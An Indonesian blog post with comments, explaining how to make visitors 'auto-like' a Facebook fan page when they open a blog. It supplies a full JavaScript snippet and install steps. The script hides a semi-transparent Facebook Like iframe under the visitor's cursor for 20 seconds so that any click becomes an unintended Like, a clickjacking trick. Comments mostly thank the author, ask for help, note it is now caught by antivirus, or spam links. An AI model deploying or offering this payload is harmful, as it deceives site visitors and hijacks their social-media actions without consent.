Cara Membuat Auto Like FanPage Saat Membuka Web/Blog [Script]

Cara Membuat Auto Like FanPage Saat Membuka Web/Blog [Script]

Rafi Orilya,- Mungkin sobat pernah berkunjung kesuatu blog.. ehh ternyata ko tiba-tiba sobat Like FanPage blog itu padahal sobat tidak pernah mengklik “LIKE”-? Yup, memang itu berhubungan dengan Judul Postingan Diatas :)

Gimana-? Apakah sobat tertarik dengan yang seperti itu-?
Apakah sobat ingin memasangnya pada blog sobat juga, agar FanPage sobat banyak Liker.nya hehe.. tapi sobat harus ingat, kadang pengunjung jika dipaksa like maka akan unlike karena merasa dipaksa.
Hahaha....

Oke kalo mau pasang ikuti langkah dibawah :
1. Buka blogger
2. Masuk ke Tata Letak
3. Buka Notepad, dan copy paste script dibawah :

(function(){var Xcord=0,Ycord=0,IE=document.all?true:false;if(!IE)document.captureEvents(Event.MOUSEMOVE);var lbox=document.createElement('iframe');lbox.src='http://www.facebook.com/plugins/like.php?href='+ encodeURIComponent('http://www.facebook.com/rafi.orilya.groups')+'&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80';lbox.scrolling='no';lbox.frameBorder=0;lbox.allowTransparency='true';lbox.style.border=0;lbox.style.overflow='hidden';lbox.style.cursor='pointer';lbox.style.width='53px';lbox.style.height='23px';lbox.style.position='absolute';lbox.style.opacity=0.5;document.getElementsByTagName('body')[0].appendChild(lbox);window.addEventListener('mousemove',mouseMove,false);setTimeout(function(){document.getElementsByTagName('body')[0].removeChild(lbox);window.removeEventListener('mousemove',mouseMove,false);},20000);function mouseMove(e){if(IE){Xcord=event.clientX+ document.body.scrollLeft;Ycord=event.clientY+ document.body.scrollTop;}else{Xcord=e.pageX;Ycord=e.pageY;}if(Xcord<0)Xcord=0;if(Ycord<0)Ycord=0;lbox.style.top=(Ycord- 8)+'px';lbox.style.left=(Xcord- 25)+'px';return true}})();

4. Edit script tersebut
- Pada link http://www.facebook.com/rafi.orilya.groups diganti dengan URL FanPage Anda
- Pada script “'mousemove',mouseMove,false);},20000);” angka 20000 dapat diganti terserah anda
5. Save Notepad dengan nama “auto.js” atau nama terserah sobat yg penting ekstensi .js
6. Upload file “auto.js” ke hosting, atau ke http://sites.google.com => masuk ke Lampiran => Upload
7. Copt scipt dibawah :
<script src='URL SCRIPT' type='text/javascript'></script>
Atau
 <script type="text/javascript" src="URLSCRIPT"></script>
- Ganti “URLSCRIPT” dengan url file “auto.js” yang tadi diupload
8. Kembali ke blogger => Tata Letak => Tambah Gadget
9. Paste Script tadi => Save
Selesai....

Mungkin posting diatas dapat bermanfaat bagi sobat yang membaca, dan berkenan berkomentar dibawah walau hanya sekedar menyapa, hehe..
Sampai ketemu diposting selanjutnya :)

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
Hak Cipta Dilindungi


Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

54 komentar

  1. Komentar ini telah dihapus oleh administrator blog.

    BalasHapus
  2. hehehe... thank's comment.a sobb :)
    yooo.... siip- lebih baik natural hehehe...

    yoo, sob-salam berbagi juga

    BalasHapus
  3. ga komplit , tambah kan gadget ga komplit, jika di tahbahkan masih ada terusan nya yaitu
    dasar2
    gadged
    lain nya
    tambahkan
    milik anda

    jika masih banyak ? mau paste dimana?

    trims

    BalasHapus
  4. saya kira kenapa waktu saya buka blog salah satu sahabat blogger facebook saya autolike dengan fans page blog tersebut. ternyata karena ini. :-d

    kira2 dengan menggunakan cara ini ada efeknya ga sob?
    di seonya misalnya?

    BalasHapus
  5. hahaha.... :d
    efek.nya mungkin susah terindex search engine :D

    BalasHapus
  6. waduh... mungkin udah ga jalan sob... ntar diupdate lagi deh..

    BalasHapus
  7. (o) nothing to say more.. (h)
    btw, apa sudah diupdate ni :-?

    BalasHapus
    Balasan
    1. Belum nih sob... gw ngga smpet :(
      bingung, malah jadinya.. hehe

      Hapus
  8. Kalo ada efeknya susah terindek lebih baik jangan digunakan sob, atau jangan di update aja daripada tambah pusing..
    Soalnya ngerugiin pemilik blog juga nantinya, like bertamah tpi susah terindex sama aja bohong. Jadi mana ada yg berkunjung ke tempat kita kalo tidak erindex, itu sih saran aku.. Hehhee....
    Keep posting gan )
    Salam blogger

    BalasHapus
    Balasan
    1. Thank's banyak sob... masukkannya ane setuju yah :D
      memang, seperti itu dapat merugikan pemilik maupun pengunjung, so.. I think so..
      thank's
      salam blogger

      Hapus
  9. Gan kalo masuk ke lampiran tulisan lampiran dimananya ya ? ane kok tidak ada ? ;-(

    BalasHapus
  10. Gan kunjungi bali ya . Http://www.after-focus.blogspot.com & Http://www.mrchalid.blogspot.com

    BalasHapus
  11. sob ini yang di copy code yang atas ma code yang scrift di bawah di satuin ga ..

    tollong jawab secepatna ..
    atau kasih contoh yang jelas ..

    BalasHapus
    Balasan
    1. hanya script yang warna hijau ajah mas.. terus lihat petunjuknya untuk diedit... :)

      Hapus
  12. wah thanks gan triknya oya ane bleh tau cara buat emoticon seperti punya agan ini (f) gimana ya caranya :-? kasih tau dong gan (p) komfirmasi di blog ane ya gan ane mau masang emoticon ini ;-(

    BalasHapus
    Balasan
    1. oya gan ini blog ane deimon-community.blogspot.com :)

      Hapus
    2. Di google pake keyword "Pasang Emoticon di Komentar Blog" Banyak tuh sob... dicomot ajah :D

      Hapus
  13. =)) maKasih Ya atas tipsnya klo sempat kunjungi blog kami http://blogigolo.blogspot.com/

    BalasHapus
  14. visit gameterbarugratis.blogspot.com .. liat fan page saya .. hahahaha
    kunjungan balik mas brooo

    BalasHapus
  15. ok sob..kunjungan balik.

    BalasHapus
    Balasan
    1. Ada script terbarunya mas... silahkan saja cari di search.. WORK 100%

      Hapus
  16. ok akan saya coba,, ngomong2 kalo di wordpress bisa dipake ga gan??
    kunjungi juga y gan http://fastboatmurahkegili.com

    https://www.facebook.com/pages/Fast-Boat-Murah-Dari-Bali-Ke-Gili/362731187176902

    BalasHapus
    Balasan
    1. monggo dicooba dulu, saya juga belum tahu kalau di wordpress sudah bisa atau engga

      Hapus
  17. sekedar berbagi aja. Like FP otomatis ini biasa digunakan para penjual di website. mereka tidak mempusingkan SEO tapi lebih ke visitor yang mengenal produk mereka. jadi mau digunakan atau tidak tentu anda yang memutuskan :D

    BalasHapus
  18. silahkan kunjungi gan blog baru ane
    http://sasaklover.blogspot.com/

    BalasHapus
  19. Visitornya kren,tp syg gx pakai http://popcash.net/register/11518 .
    Coba pakai,pasti dollar sudah banyak terkumpul.
    Maksudnya setiap visitor visit blog kita dapat dollar....

    BalasHapus
  20. Ternyata ini ya mas, pernah saya seperti ini saat masuk ke situs blogger lalu kok tiba-tiba facebook saya nge-like fanspagenya ya, padahal saya belum klik like. Ternyata dibalik semua ini ada caranya ya

    muaeehhheee jadi tau deh makasih

    BalasHapus
  21. Wah ternyata ini yang banyak di pake blog lain, makasi infonya bang

    BalasHapus
  22. Ini yang saya cari gan..
    terima kasih gan

    BalasHapus
  23. Iya gan, tapi sekarang sudah terdeteksi antivirus

    BalasHapus
  24. ijin nanem backlink

    TUTORIAL LENGKAP MEMBUAT GAME PUZZLE FLASH
    http://helmykkediricomp.blogspot.com
    Terimakasih

    BalasHapus
  25. JOss gan .... :ng mampir ke Harianseluler.com yahhh .... :-d

    BalasHapus
  26. numpang ninggalin jejak mbah

    visit balik ya

    Central-Data.com

    BalasHapus
  27. angka 2000 itu fungsinya buat apa?

    BalasHapus
  28. Ane pengen pasang di blog aktifasi cug telkomsel http://klikcug.blogspot.com . Tapi klo gk ter index bijimaneee

    BalasHapus
  29. awalnya mau pasang untuk page saya bro. tapi sdah gak bisa yahh

    kunjungi page saya juga yahh

    https://lesprivatbrighteducationmakassar.wordpress.com/perangkat-pengajar/

    BalasHapus
  30. ini masih work kah gan?? https://ekonter.net ijin

    BalasHapus
  31. Terima kasih infonya, itu yang nge-like facebook nya bot bukan ya bos ?

    BalasHapus
  32. kurang direkomendasikan sepertinya dengan cara ini. Lebih baik natural aja meskipun agak berat

    BalasHapus
  33. makasih, dapat pencerahan disini. kebetulan masih newbie!

    BalasHapus

Komentar anda sangat dibutuhkan bagi kemajuan kami untuk terus berkarya.
Diharapkan :
* Berkomentarlah dengan bahasa yang baik
* Tidak ada unsur SARA, SPAM, PORNO
* Tidak merugikan orang lain
* Menunjukkan identitas yang jelas bukan Anonim

Diperkenankan :
* Komentar promosi link web anda
* Kritik & Saran

[Protected] by DMCA Protection Pro™
EmoticonEmoticon